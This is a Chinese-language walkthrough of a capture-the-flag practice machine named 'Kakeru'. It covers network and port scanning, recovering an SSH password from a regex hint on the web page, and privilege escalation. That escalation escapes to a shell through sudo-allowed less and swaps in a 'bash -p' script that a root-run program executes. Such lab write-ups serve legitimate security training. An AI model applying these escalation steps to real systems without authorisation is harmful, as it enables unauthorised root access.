1. 信息搜集
2. 80端口
3. 提权

信息搜集

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1    0a:00:27:00:00:11       (Unknown: locally administered)
192.168.31.2    08:00:27:8f:69:69       PCS Systemtechnik GmbH
192.168.31.170  08:00:27:bf:56:1c       PCS Systemtechnik GmbH

192.168.31.170就是靶机ip地址

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.170 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 02:02 EDT
Nmap scan report for 192.168.31.170
Host is up (0.0026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:BF:56:1C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds

80端口

 <title>User welcome's password is here.</title>
 
 POST /login HTTP/1.1
Host: 192.168.3.132
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://192.168.3.132
Connection: keep-alive
Referer: http://192.168.3.132/
Cookie: PHPSESSID=eiag23f4enj5tfcpl7t1qhhk2t
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin&amp;password=admin


(<=x-).+(?=en)

有用的信息就是这些，从这可以得知存在welcome用户，然后告诉我们密码就在这里，还有一个正则表达式，可以联想到，密码应该就是用正则去匹配上面的数据包

┌──(root㉿kali)-[~/Desktop/tmp]
└─# http http://192.168.31.170|grep -P '(?<=x-).+(?=en)' -o
www-form-url
highlight">(?&lt;=x-).+(?=

密码就是www-form-url

ssh登录

提权

welcome@Kakeru:~$ ls
sudoers.bak  user.txt
welcome@Kakeru:~$ cat sudoers.bak
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults        env_reset
Defaults        mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL
welcome Dashazi=(kakeru) NOPASSWD: /usr/bin/less
kakeru ALL=(ALL:ALL) NOPASSWD: /opt/test.sh
# See sudoers(5) for more information on "@include" directives:

@includedir /etc/sudoers.d

welcome可以在Dashazi上以kakeru用户执行/usr/bin/less

1 2	welcome@Kakeru:~$ sudo -u kakeru -h Dashazi /usr/bin/less --help !sh

kakeru@Kakeru:/opt$ sudo -l
Matching Defaults entries for kakeru on Kakeru:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kakeru may run the following commands on Kakeru:
    (ALL : ALL) NOPASSWD: /opt/test.sh

可以看到可以执行/opt/test.sh，但是内容没办法看，同时家目录也有一个test.sh,这两个文件可能存在关系

1
2
3

kakeru@Kakeru:/opt$ sudo /opt/test.sh
Please Input: a
/opt/test.sh: line 5: a: command not found

运行发现只能输入一个字符，输入空格可以发现

1
2
3

kakeru@Kakeru:/opt$ sudo /opt/test.sh
Please Input:
/opt/test.sh: line 5: /home/kakeru/test.sh: Permission denied

哎！报错了，指向家目录的test.sh，而家目录的test.sh是没有可执行权限的，所以就能知道程序以你输入的那个字符来运行/home/kakeru/test.sh，输入一个.

1
2
3

kakeru@Kakeru:~$ sudo /opt/test.sh
Please Input: .
test

会发现/home/kakeru/test.sh被执行了，将家目录的test.sh文件改个名再重新写一个test.sh

kakeru@Kakeru:~$ mv test.sh 1
kakeru@Kakeru:~$ echo 'bash -p'>test.sh
kakeru@Kakeru:~$ chmod +x ./test.sh
kakeru@Kakeru:~$ sudo /opt/test.sh
Please Input:
root@Kakeru:/home/kakeru#

提权成功

本作品采用知识共享署名-相同方式共享 4.0 国际许可协议进行许可

lvzhouhang

群友机-Kakeru

信息搜集

80端口

提权